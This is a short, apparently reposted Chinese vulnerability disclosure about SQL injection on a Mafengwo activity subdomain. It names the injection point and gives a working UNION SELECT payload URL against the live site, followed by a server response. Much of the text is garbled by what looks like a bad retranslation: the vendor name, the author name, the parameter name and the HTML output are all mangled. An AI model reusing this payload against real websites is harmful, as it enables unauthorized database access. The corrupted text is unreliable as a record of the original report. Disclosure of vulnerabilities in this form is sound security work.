漏洞标题 蚂蜂窝某分站存在SQL注入漏洞(可UNION) 相关厂商 蚂蜂窝 漏洞作者 猪猪侠 提交时间 2016-04-25 10:01 公开时间 2016-06-09 10:10 漏洞类型 SQL注…
漏洞标题
天线的子站(UNION)中存在SQL注入漏洞
相关制造商
蚂蚁蜂窝
漏洞作者
猪人
提交时间
2016-04-25 10: 01
公共时间
2016-06-09 10: 10
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
漏洞详细信息
#1漏洞网站
http://activity.mafengwo.cn
#2注射点
http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1
#3注射参数
援助=1
漏洞证明:
#数据库版本
http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1%20and%201=2%20union%20select%201,2,version(),4,5,6,7,8%23
{'data':'
\ n
\ n
< \/DIV> \ n
21年5月5日日志< \/p为H.< \/DIV> \ n
< \ I&GT /;
7 \ u7968< \/p>< \/div> \ n< \/li> \ n< \/ul> \ n','msg':'','code': 1}
数据存储名称
Failure when receiving data from the peer
-
发表于 2016-07-17 08:00
- 阅读 ( 442 )
- 分类:黑客技术
